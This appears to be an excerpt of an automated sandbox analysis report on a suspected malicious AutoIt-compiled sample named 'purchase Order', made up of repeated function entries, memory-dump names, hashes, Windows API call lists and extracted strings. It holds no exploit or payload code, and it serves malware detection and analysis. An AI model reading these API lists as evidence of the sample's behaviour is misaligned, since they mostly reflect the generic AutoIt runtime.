Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 59386fffb9251573e0dda5a37e1fab3151aad2cbf029760b1c93393b278684ed
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 22C1D6362051930ADF3D463AC47543FBBA15EA17B232A076DD8B3DB5D1EF60CA68D620

Function 00C606D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 71eb6a95ec0744201c8e7d7b00ceb9a1a10e25e2316ac0aed32bf768e2e2bfe5
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: E3C1D73620519309DF3D463AC47543FBBA15EA27B232A076DD8B3DB4D5EF20CA68D620

Function 00C5FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 7024a6671a5fa7ce638882aa4b92471e9b4e290574da5ae8ab252451083f0768
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E9C1D53A20509309DF2D463AD43543EBAA15AA17B331A077DDCB3CB4D5EF10DAAED624

Function 017CE458 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: eb8e09efa1ded24fc7ac646d236dfdcabe32ab26084a795542bdf037f987812f
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9A41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80

Function 017CE2E8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: ac591c3d00bf2963a0104d03450a24b5b5c1353ac7c0c17c2f747e6413a72d99
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: D7019278A00109EFCB45DF98C5909AEFBB5FB48710F20859DD809A7345D730AE41DB80

Function 017CE348 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: d6ad933a5bd70b7912e78c449ea5b3e5a72edc8fe4e5f4700ba6312a1ea0cfed
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 55019278A00109EFCB44DF98C5909AEFBB5FB88710F20859DD819A7345DB30AE51DB80

Function 017CCCC8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00C9A2A9 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C9A2FE
DeleteObject.GDI32(00000000), ref: 00C9A310
DestroyWindow.USER32 ref: 00C9A31E
GetDesktopWindow.USER32 ref: 00C9A338
GetWindowRect.USER32(00000000), ref: 00C9A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C9A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C9A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A4D8
GetClientRect.USER32(00000000,?), ref: 00C9A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A55E
GlobalLock.KERNEL32(00000000), ref: 00C9A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A576
GlobalUnlock.KERNEL32(00000000), ref: 00C9A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A586
GlobalFree.KERNEL32(00000000), ref: 00C9A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CCD9BC,00000000), ref: 00C9A5B9
GlobalFree.KERNEL32(00000000), ref: 00C9A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C9A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C9A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9A81D

Strings

, xrefs: 00C9A7A3
AutoIt v3, xrefs: 00C9A4D0
@U=u, xrefs: 00C9A60E, 00C9A79D
static, xrefs: 00C9A518, 00C9A66F
DISPLAY, xrefs: 00C9A680

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: e23de51b347763a66f31e49e1396c13b2c91a0bf21a34eeabf9db86b00e74571
Instruction ID: 82b62888e744bcb8176ff13e80990a8f327f6c3963fa3e2ea94e0c6bd5e652fc
Opcode Fuzzy Hash: e23de51b347763a66f31e49e1396c13b2c91a0bf21a34eeabf9db86b00e74571
Instruction Fuzzy Hash: 1A025A75900214EFDB14DFA4CD89FAE7BB9FB48310F148558F916AB2A1CB70AD41CBA0

Function 00CAD285 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00CAD2DB
GetSysColorBrush.USER32(0000000F), ref: 00CAD30C
GetSysColor.USER32(0000000F), ref: 00CAD318
SetBkColor.GDI32(?,000000FF), ref: 00CAD332
SelectObject.GDI32(?,00000000), ref: 00CAD341
InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD36C
GetSysColor.USER32(00000010), ref: 00CAD374
CreateSolidBrush.GDI32(00000000), ref: 00CAD37B
FrameRect.USER32(?,?,00000000), ref: 00CAD38A
DeleteObject.GDI32(00000000), ref: 00CAD391
InflateRect.USER32(?,000000FE,000000FE), ref: 00CAD3DC
FillRect.USER32(?,?,00000000), ref: 00CAD40E
GetWindowLongW.USER32(?,000000F0), ref: 00CAD439

Part of subcall function 00CAD575: GetSysColor.USER32(00000012), ref: 00CAD5AE
Part of subcall function 00CAD575: SetTextColor.GDI32(?,?), ref: 00CAD5B2
Part of subcall function 00CAD575: GetSysColorBrush.USER32(0000000F), ref: 00CAD5C8
Part of subcall function 00CAD575: GetSysColor.USER32(0000000F), ref: 00CAD5D3
Part of subcall function 00CAD575: GetSysColor.USER32(00000011), ref: 00CAD5F0
Part of subcall function 00CAD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CAD5FE
Part of subcall function 00CAD575: SelectObject.GDI32(?,00000000), ref: 00CAD60F
Part of subcall function 00CAD575: SetBkColor.GDI32(?,00000000), ref: 00CAD618
Part of subcall function 00CAD575: SelectObject.GDI32(?,?), ref: 00CAD625
Part of subcall function 00CAD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD644
Part of subcall function 00CAD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CAD65B
Part of subcall function 00CAD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00CAD670
Part of subcall function 00CAD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CAD698

Strings

@U=u, xrefs: 00CAD463

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID: @U=u
API String ID: 3521893082-2594219639
Opcode ID: f51882f348542ae5331b20720044165e329ff7ba28ba10e70b011e6c604d43c4
Instruction ID: d9f80265323d6a1abb2227a0fa9c8b40b25a52f2132ed88de7e98679a065f1e4
Opcode Fuzzy Hash: f51882f348542ae5331b20720044165e329ff7ba28ba10e70b011e6c604d43c4
Instruction Fuzzy Hash: 29916EB1409302BFDB109F64DC48F6FBBA9FB89325F100A29F963961A0D771E945CB52

Function 00C5B8FD Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00C5B98B
DeleteObject.GDI32(00000000), ref: 00C5B9CD
DeleteObject.GDI32(00000000), ref: 00C5B9D8
DestroyIcon.USER32(00000000), ref: 00C5B9E3
DestroyWindow.USER32(00000000), ref: 00C5B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 00CBD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CBD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00CBD711

Part of subcall function 00C5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C5B759,?,00000000,?,?,?,?,00C5B72B,00000000,?), ref: 00C5BA58

SendMessageW.USER32 ref: 00CBD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CBD76F
ImageList_Destroy.COMCTL32(00000000), ref: 00CBD785
ImageList_Destroy.COMCTL32(00000000), ref: 00CBD790

Strings

@U=u, xrefs: 00CBD2AA, 00CBD3B1, 00CBD68E
0, xrefs: 00CBD5A5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 464785882-975001249
Opcode ID: 408247fe8ae717a3eead802bc9f7f92adcdcc1ae376b9676862701a325ab6c63
Instruction ID: 23614f00de7961d18ad77e0a44a0ce810bb0dd1c8a108d8fb52c66c63e84f6fe
Opcode Fuzzy Hash: 408247fe8ae717a3eead802bc9f7f92adcdcc1ae376b9676862701a325ab6c63
Instruction Fuzzy Hash: 5F129B742042029FDB21CF28C884BA9BBF5FF05305F144569F99ACB262DB31ED86DB91

Function 00CAD575 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00CAD5AE
SetTextColor.GDI32(?,?), ref: 00CAD5B2
GetSysColorBrush.USER32(0000000F), ref: 00CAD5C8
GetSysColor.USER32(0000000F), ref: 00CAD5D3
CreateSolidBrush.GDI32(?), ref: 00CAD5D8
GetSysColor.USER32(00000011), ref: 00CAD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CAD5FE
SelectObject.GDI32(?,00000000), ref: 00CAD60F
SetBkColor.GDI32(?,00000000), ref: 00CAD618
SelectObject.GDI32(?,?), ref: 00CAD625
InflateRect.USER32(?,000000FF,000000FF), ref: 00CAD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CAD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 00CAD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CAD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CAD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 00CAD6DD
DrawFocusRect.USER32(?,?), ref: 00CAD6E8
GetSysColor.USER32(00000011), ref: 00CAD6F6
SetTextColor.GDI32(?,00000000), ref: 00CAD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CAD712
SelectObject.GDI32(?,00CAD2A5), ref: 00CAD729
DeleteObject.GDI32(?), ref: 00CAD734
SelectObject.GDI32(?,?), ref: 00CAD73A
DeleteObject.GDI32(?), ref: 00CAD73F
SetTextColor.GDI32(?,?), ref: 00CAD745
SetBkColor.GDI32(?,?), ref: 00CAD74F

Strings

@U=u, xrefs: 00CAD698

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: 4d34e5859c374733c1871dc1b22bd7bbcf0aeb5bef8ca2b4e3794acef85b31cf
Instruction ID: d1734d06d171f03b2afddc10c079d0dc46444eaa60efcdde948b1b4636695254
Opcode Fuzzy Hash: 4d34e5859c374733c1871dc1b22bd7bbcf0aeb5bef8ca2b4e3794acef85b31cf
Instruction Fuzzy Hash: F3513BB1900209AFDB109FA8DC48FAEBB79FB09324F144525F927AB2A1D7719A41DF50

Function 00C8DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C8DBD6
GetDriveTypeW.KERNEL32(?,00CDDC54,?,\\.\,00CDDC00), ref: 00C8DCC3
SetErrorMode.KERNEL32(00000000,00CDDC54,?,\\.\,00CDDC00), ref: 00C8DE29

Strings

RAID, xrefs: 00C8DDC4
SAS, xrefs: 00C8DDD2
Removable, xrefs: 00C8DD15
RAMDisk, xrefs: 00C8DCED
SSD, xrefs: 00C8DD50
PhysicalDrive, xrefs: 00C8DC67
\\.\, xrefs: 00C8DC2B
FileBackedVirtual, xrefs: 00C8DDF5
Virtual, xrefs: 00C8DDEE
Fibre, xrefs: 00C8DDB6
iSCSI, xrefs: 00C8DDCB
SATA, xrefs: 00C8DDD9
SSA, xrefs: 00C8DDAF
SCSI, xrefs: 00C8DD93
ATAPI, xrefs: 00C8DD9A
Network, xrefs: 00C8DD01
MMC, xrefs: 00C8DDE7
Fixed, xrefs: 00C8DD0B
USB, xrefs: 00C8DDBD
CDROM, xrefs: 00C8DCF7
1394, xrefs: 00C8DDA8
ATA, xrefs: 00C8DDA1
Unknown, xrefs: 00C8DCE3, 00C8DD8C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 67b859e1bc06f2f2d7b6543e468c34952978dcf2631d87163ae766392f369c18
Instruction ID: 44b3fe8ad2bf16352c35258f5c3623a105a8a8706d16f62fbf437616e879ae00
Opcode Fuzzy Hash: 67b859e1bc06f2f2d7b6543e468c34952978dcf2631d87163ae766392f369c18
Instruction Fuzzy Hash: 0551B130248346BBC650FF12C892939B7A0FB94709F20492AF5179B2E1DB70DA45EB5B

Function 00CAC6E9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CAC788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CAC83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 00CAC859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CACB15

Strings

@U=u, xrefs: 00CAC83E, 00CAC859, 00CAC9D5, 00CACA08, 00CACA68, 00CACAB1, 00CACB15, 00CACB39, 00CACBED
0, xrefs: 00CAC89C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0$@U=u
API String ID: 2326795674-975001249
Opcode ID: 9d98b196c1295a8593ce4229a44b80626eb8dc6bc15e4c56730c5c495f090bdf
Instruction ID: 3d9638d25ad943c8b12951b035f5cb8ea5cacfb114babf9f0b4e9a42f590dcbe
Opcode Fuzzy Hash: 9d98b196c1295a8593ce4229a44b80626eb8dc6bc15e4c56730c5c495f090bdf
Instruction Fuzzy Hash: 53F1C371104302AFD7258F28CCC9BAABBE4FF4A358F04052DF5A9D62A1C775CA45DBA1

Function 00C4CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C4CC68
__wcsnicmp.LIBCMT ref: 00C4CC80
__wcsnicmp.LIBCMT ref: 00C4CC98
__wcsnicmp.LIBCMT ref: 00C4CCB0
__wcsnicmp.LIBCMT ref: 00C4CCC8
__wcsnicmp.LIBCMT ref: 00C4CCE0
__wcsnicmp.LIBCMT ref: 00C4CCF8
__wcsnicmp.LIBCMT ref: 00C4CD0C
__wcsnicmp.LIBCMT ref: 00C4CD4D
__wcsnicmp.LIBCMT ref: 00C4CD61
__wcsnicmp.LIBCMT ref: 00C4CD75
__wcsnicmp.LIBCMT ref: 00C4CD89

Strings

Cannot parse #include, xrefs: 00CB2FA1
Unterminated group of comments, xrefs: 00CB2FB4
#ce, xrefs: 00C4CD83
#cs, xrefs: 00C4CD06, 00C4CD5B
#requireadmin, xrefs: 00C4CC92
#include, xrefs: 00C4CCDA
#include-once, xrefs: 00C4CCC2
#comments-start, xrefs: 00C4CCF2, 00C4CD47
#comments-end, xrefs: 00C4CD6F
#OnAutoItStartRegister, xrefs: 00C4CCAA
#pragma compile, xrefs: 00C4CC62
#notrayicon, xrefs: 00C4CC7A
Bad directive syntax error, xrefs: 00CB2ECB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 9329ce8610e421eff401e957dd77c96d000fd67e17ac8b4c9195eaa297b740fe
Instruction ID: 3177dce9d9279cfc0b184b5ec9a61c996d81c547e18765ca7b202c631c6eda0d
Opcode Fuzzy Hash: 9329ce8610e421eff401e957dd77c96d000fd67e17ac8b4c9195eaa297b740fe
Instruction Fuzzy Hash: 3E812730A41215BBCB64AEA5CCC2FBB3768BF14701F084039FD06AB1D6EB60DA45D2A5

Function 00CA638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00CDDC00), ref: 00CA6449

Strings

SHOWDROPDOWN, xrefs: 00CA6500
CURRENTTAB, xrefs: 00CA64DD
HIDEDROPDOWN, xrefs: 00CA6520
EDITPASTE, xrefs: 00CA675B
GETSELECTED, xrefs: 00CA66C1
ISVISIBLE, xrefs: 00CA6455
GETLINECOUNT, xrefs: 00CA66E4
ISCHECKED, xrefs: 00CA6659
TABLEFT, xrefs: 00CA64A7
SETCURRENTSELECTION, xrefs: 00CA65D6
DELSTRING, xrefs: 00CA6569
ADDSTRING, xrefs: 00CA6536
GETLINE, xrefs: 00CA678B
ISENABLED, xrefs: 00CA648C
UNCHECK, xrefs: 00CA66A1
CHECK, xrefs: 00CA668B
FINDSTRING, xrefs: 00CA6596
GETCURRENTCOL, xrefs: 00CA6724
SENDCOMMANDID, xrefs: 00CA67CA
GETCURRENTSELECTION, xrefs: 00CA6603
GETCURRENTLINE, xrefs: 00CA6704
SELECTSTRING, xrefs: 00CA6626
TABRIGHT, xrefs: 00CA64BD

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
